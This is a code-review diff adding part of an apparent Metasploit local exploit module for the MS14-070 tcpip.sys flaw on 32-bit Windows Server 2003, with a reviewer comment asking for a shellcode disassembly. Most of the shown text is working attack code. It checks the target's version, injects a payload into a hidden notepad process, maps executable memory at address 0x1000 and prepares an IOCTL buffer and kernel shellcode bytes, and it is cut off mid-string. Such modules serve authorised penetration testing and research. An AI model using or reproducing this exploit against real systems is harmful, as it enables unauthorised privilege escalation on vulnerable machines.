modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

```diff
@@ -0,0 +1,177 @@
+      ])
+
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
+    unless file?(file_path)
+      return Exploit::CheckCode::Unknown
+    end
+
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_proc
+    windir = session.sys.config.getenv('windir')
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    begin
+      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    proc.pid
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    p = payload.encoded
+    new_pid = create_proc
+
+    if new_pid.nil?
+      print_warning('Unable to create a new process.')
+      return
+    end
+
+    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
+    unless execute_shellcode(p, nil, new_pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
+
+    if not this_proc.memory.writable?(0x1000)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("0x1000 is now writable")
+    end
+
+    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
+
+    sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"
```

Comment:
A disassembly of the shellcode in comments would be nice, so we understand what it is expected to do.